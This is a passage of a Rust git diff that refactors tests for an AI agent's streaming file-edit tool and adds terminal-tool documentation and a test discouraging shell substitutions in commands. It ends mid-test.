Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), project.clone(), - action_log, - )); - let edit_tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - languages, + action_log.clone(), + true, )); // Read the file first @@ -4403,13 +3459,13 @@ mod tests { // Try to edit - should fail because buffer has unsaved changes let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit with dirty buffer".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "original content".into(), new_text: "new content".into(), }]), @@ -4420,7 +3476,12 @@ mod tests { }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; assert!( @@ -4438,51 +3499,21 @@ mod tests { "Error should ask user to manually save or revert when tools aren't available, got: {}", error ); + assert!(diff.is_empty()); + assert!(input_path.is_none()); } #[gpui::test] - async fn test_streaming_overlapping_edits_detected_early(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - // The file content is crafted so that edit 1's replacement still - // contains the old_text of edit 2 as a contiguous substring. - // Without early overlap detection, edit 2 would silently match - // inside the already-modified region and corrupt the file instead - // of producing a clear "Conflicting edit ranges" error. - fs.insert_tree( - "/root", - json!({ - "file.txt": "aaa\nbbb\nccc\nddd\neee\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + async fn test_streaming_overlapping_edits_resolved_sequentially(cx: &mut TestAppContext) { + // Edit 1's replacement introduces text that contains edit 2's + // old_text as a substring. Because edits resolve sequentially + // against the current buffer, edit 2 finds a unique match in + // the modified buffer and succeeds. + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup: resolve the buffer sender.send_partial(json!({ @@ -4492,17 +3523,10 @@ mod tests { })); cx.run_until_parked(); - // Edit 1 targets "bbb\nccc" (lines 2-3) and replaces it with - // text that preserves "ccc\nddd" as a contiguous substring in the - // buffer — so edit 2's old_text will still match after edit 1 is - // applied. - // - // Edit 2 targets "ccc\nddd" (lines 3-4), overlapping with edit 1 on - // line 3 ("ccc"). After edit 1 runs, the buffer becomes: - // "aaa\nXXX\nccc\nddd\nddd\neee\n" - // and "ccc\nddd" is still present, so edit 2 would silently - // succeed without early overlap detection. - // + // Edit 1 replaces "bbb\nccc" with "XXX\nccc\nddd", so the + // buffer becomes "aaa\nXXX\nccc\nddd\nddd\neee\n". + // Edit 2's old_text "ccc\nddd" matches the first occurrence + // in the modified buffer and replaces it with "ZZZ". // Edit 3 exists only to mark edit 2 as "complete" during streaming. sender.send_partial(json!({ "display_description": "Overlapping edits", @@ -4517,7 +3541,7 @@ mod tests { cx.run_until_parked(); // Send the final input with all three edits. - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit", @@ -4529,228 +3553,645 @@ mod tests { })); let result = task.await; - // We expect a "Conflicting edit ranges" error. Currently the overlap - // goes undetected during streaming and the file gets silently - // corrupted, so this assertion will fail until we add early overlap - // detection. - match result { - Err(StreamingEditFileToolOutput::Error { error }) - if error.contains("Conflicting edit ranges") => {} - Err(StreamingEditFileToolOutput::Error { error }) => { - panic!("Expected 'Conflicting edit ranges' error, got different error: {error}"); - } - Ok(output) => { - panic!("Expected 'Conflicting edit ranges' error, but got success: {output}"); - } - Err(other) => { - panic!("Expected 'Conflicting edit ranges' error, got unexpected output: {other}"); - } - } + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "aaa\nXXX\nZZZ\nddd\nDUMMY\n"); } #[gpui::test] async fn test_streaming_create_content_streamed(cx: &mut TestAppContext) { - init_test(cx); + let (tool, project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Stream content incrementally + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\n" + })); + cx.run_until_parked(); + + // Verify buffer has partial content + let buffer = project.update(cx, |project, cx| { + let path = project + .find_project_path("root/dir/new_file.txt", cx) + .unwrap(); + project.get_open_buffer(&path, cx).unwrap() + }); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); + + // Stream more content + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); + + // Stream final chunk + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "line 1\nline 2\nline 3\n" + ); + + // Send final input + sender.send_full(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nline 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, mut receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Get the diff entity from the event stream + receiver.expect_update_fields().await; + let diff = receiver.expect_diff().await; + + // Diff starts pending with no revealed ranges + diff.read_with(cx, |diff, cx| { + assert!(matches!(diff, Diff::Pending(_))); + assert!(!diff.has_revealed_range(cx)); + }); + + // Stream first content chunk + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + + // Diff should now have revealed ranges showing the new content + diff.read_with(cx, |diff, cx| { + assert!(diff.has_revealed_range(cx)); + }); + + // Send final input + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + + // Diff is finalized after completion + diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); + } + + #[gpui::test] + async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Verify buffer still has old content (no content partial yet) + let buffer = project.update(cx, |project, cx| { + let path = project.find_project_path("root/file.txt", cx).unwrap(); + project.open_buffer(path, cx) + }); + let buffer = buffer.await.unwrap(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "old line 1\nold line 2\nold line 3\n" + ); + + // First content partial replaces old content + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); + + // Subsequent content partials append + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "new line 1\nnew line 2\n" + ); + + // Send final input with complete content + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\nnew line 3\n" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + } + + #[gpui::test] + async fn test_streaming_edit_json_fixer_escape_corruption(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\nfoo\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Simulate JSON fixer producing a literal backslash when the LLM + // stream cuts in the middle of a \n escape sequence. + // The old_text "hello\nworld" would be streamed as: + // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) + // partial 2: old_text = "hello\nworld" (fixer corrected the escape) + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\\"}] + })); + cx.run_until_parked(); + + // Now the fixer corrects it to the real newline. + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld"}] + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\nfoo\n"); + } + + #[gpui::test] + async fn test_streaming_final_input_stringified_edits_succeeds(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\n"); + } + + // Verifies that after streaming_edit_file_tool edits a file, the action log + // reports changed buffers so that the Accept All / Reject All review UI appears. + #[gpui::test] + async fn test_streaming_edit_file_tool_registers_changed_buffers(cx: &mut TestAppContext) { + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit lines".to_string(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), + event_stream, + cx, + ) + }); + + let result = task.await; + assert!(result.is_ok(), "edit should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming edit, + but no changed buffers were found - Accept All / Reject All will not appear" + ); + } + + // Same test but for Write mode (overwrite entire file). + #[gpui::test] + async fn test_streaming_edit_file_tool_write_mode_registers_changed_buffers( + cx: &mut TestAppContext, + ) { + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "original content"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Overwrite file".to_string(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("completely new content".into()), + edits: None, + }), + event_stream, cx, ) }); - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); + let result = task.await; + assert!(result.is_ok(), "write should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming write, \ + but no changed buffers were found \u{2014} Accept All / Reject All will not appear" + ); + } + + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root/file.txt" + })); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create" + "display_description": "Overwrite file", + "mode": "edit" })); cx.run_until_parked(); - // Stream content incrementally sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\n" + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content"}] })); cx.run_until_parked(); - // Verify buffer has partial content - let buffer = project.update(cx, |project, cx| { - let path = project - .find_project_path("root/dir/new_file.txt", cx) - .unwrap(); - project.get_open_buffer(&path, cx).unwrap() - }); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); - - // Stream more content sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\nline 2\n" + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}] })); cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); - // Stream final chunk sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\nline 2\nline 3\n" + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root" })); cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "line 1\nline 2\nline 3\n" - ); - // Send final input - sender.send_final(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\nline 2\nline 3\n" + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root/file.txt" })); + cx.run_until_parked(); let result = task.await; let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { panic!("expected success"); }; - assert_eq!(new_text, "line 1\nline 2\nline 3\n"); + assert_eq!(new_text, "new_content"); } #[gpui::test] - async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "old line 1\nold line 2\nold line 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); + async fn test_streaming_edit_partial_last_line(cx: &mut TestAppContext) { + let file_content = indoc::indoc! {r#" + fn on_query_change(&mut self, cx: &mut Context) { + self.filter(cx); + } - let (sender, input) = ToolInput::::test(); - let (event_stream, mut receiver) = ToolCallEventStream::test(); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + fn render_search(&self, cx: &mut Context) -> Div { + div() + } + "#} + .to_string(); - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite" - })); - cx.run_until_parked(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; - // Get the diff entity from the event stream - receiver.expect_update_fields().await; - let diff = receiver.expect_diff().await; + // The model sends old_text with a PARTIAL last line. + let old_text = "}\n\n\n\nfn render_search"; + let new_text = "}\n\nfn render_search"; - // Diff starts pending with no revealed ranges - diff.read_with(cx, |diff, cx| { - assert!(matches!(diff, Diff::Pending(_))); - assert!(!diff.has_revealed_range(cx)); - }); + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - // Stream first content chunk - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\n" + sender.send_full(json!({ + "display_description": "Remove extra blank lines", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] })); - cx.run_until_parked(); - // Diff should now have revealed ranges showing the new content - diff.read_with(cx, |diff, cx| { - assert!(diff.has_revealed_range(cx)); - }); + let result = task.await; + let StreamingEditFileToolOutput::Success { + new_text: final_text, + .. + } = result.unwrap() + else { + panic!("expected success"); + }; - // Send final input - sender.send_final(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\nnew line 2\n" + // The edit should reduce 3 blank lines to 1 blank line before + // fn render_search, without duplicating the function signature. + let expected = file_content.replace("}\n\n\n\nfn render_search", "}\n\nfn render_search"); + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should only remove blank lines before render_search" + ); + } + + #[gpui::test] + async fn test_streaming_edit_preserves_blank_line_after_trailing_newline_replacement( + cx: &mut TestAppContext, + ) { + let file_content = "before\ntarget\n\nafter\n"; + let old_text = "target\n"; + let new_text = "one\ntwo\ntarget\n"; + let expected = "before\none\ntwo\ntarget\n\nafter\n"; + + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "display_description": "description", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] })); let result = task.await; + let StreamingEditFileToolOutput::Success { - new_text, old_text, .. + new_text: final_text, + .. } = result.unwrap() else { panic!("expected success"); }; - assert_eq!(new_text, "new line 1\nnew line 2\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); - // Diff is finalized after completion - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should preserve a single blank line before test_after" + ); } #[gpui::test] - async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { - init_test(cx); + async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { + let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "old line 1\nold line 2\nold line 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + // Create a new file via the streaming edit file tool + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + let result = task.await; + assert!(result.is_ok(), "create should succeed: {:?}", result.err()); + cx.run_until_parked(); + + assert!( + fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should exist after creation" + ); + + // Reject all edits — this should delete the newly created file + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log should track the created file as changed" + ); + + action_log + .update(cx, |log, cx| log.reject_all_edits(None, cx)) + .await; + cx.run_until_parked(); + + assert!( + !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should be deleted after rejecting creation, but an empty file was left behind" + ); + } + + async fn setup_test_with_fs( + cx: &mut TestAppContext, + fs: Arc, + worktree_paths: &[&std::path::Path], + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + let project = Project::test(fs.clone(), worktree_paths.iter().copied(), cx).await; let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); let context_server_registry = cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); @@ -4765,76 +4206,30 @@ mod tests { cx, ) }); - - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - + let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); let tool = Arc::new(StreamingEditFileTool::new( project.clone(), thread.downgrade(), + action_log.clone(), language_registry, )); + (tool, project, action_log, fs, thread) + } - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite" - })); - cx.run_until_parked(); - - // Verify buffer still has old content (no content partial yet) - let buffer = project.update(cx, |project, cx| { - let path = project.find_project_path("root/file.txt", cx).unwrap(); - project.get_open_buffer(&path, cx).unwrap() - }); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "old line 1\nold line 2\nold line 3\n" - ); - - // First content partial replaces old content - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\n" - })); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); - - // Subsequent content partials append - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\nnew line 2\n" - })); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "new line 1\nnew line 2\n" - ); - - // Send final input with complete content - sender.send_final(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\nnew line 2\nnew line 3\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + async fn setup_test( + cx: &mut TestAppContext, + initial_tree: serde_json::Value, + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + init_test(cx); + let fs = project::FakeFs::new(cx.executor()); + fs.insert_tree("/root", initial_tree).await; + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await } fn init_test(cx: &mut TestAppContext) { diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 6396bd1b0e63b46a0207dd7df9b9f2fcd00176b7..f36bd0fe3d3fb00931a7dc272d76eb042f6570f6 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -29,6 +29,8 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Make sure you use the `cd` parameter to navigate to one of the root directories of the project. NEVER do it as part of the `command` itself, otherwise it will error. /// +/// Do not generate terminal commands that use shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`. Resolve those values yourself before calling this tool, or ask the user for the literal value to use. +/// /// Do not use this tool for commands that run indefinitely, such as servers (like `npm run start`, `npm run dev`, `python -m http.server`, etc) or file watchers that don't terminate on their own. /// /// For potentially long-running commands, prefer specifying `timeout_ms` to bound runtime and prevent indefinite hangs. @@ -39,7 +41,7 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { - /// The one-liner command to execute. + /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. pub cd: String, @@ -628,4 +630,824 @@ mod tests { result ); } + + #[gpui::test] + async fn test_run_rejects_invalid_substitution_before_terminal_creation( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + 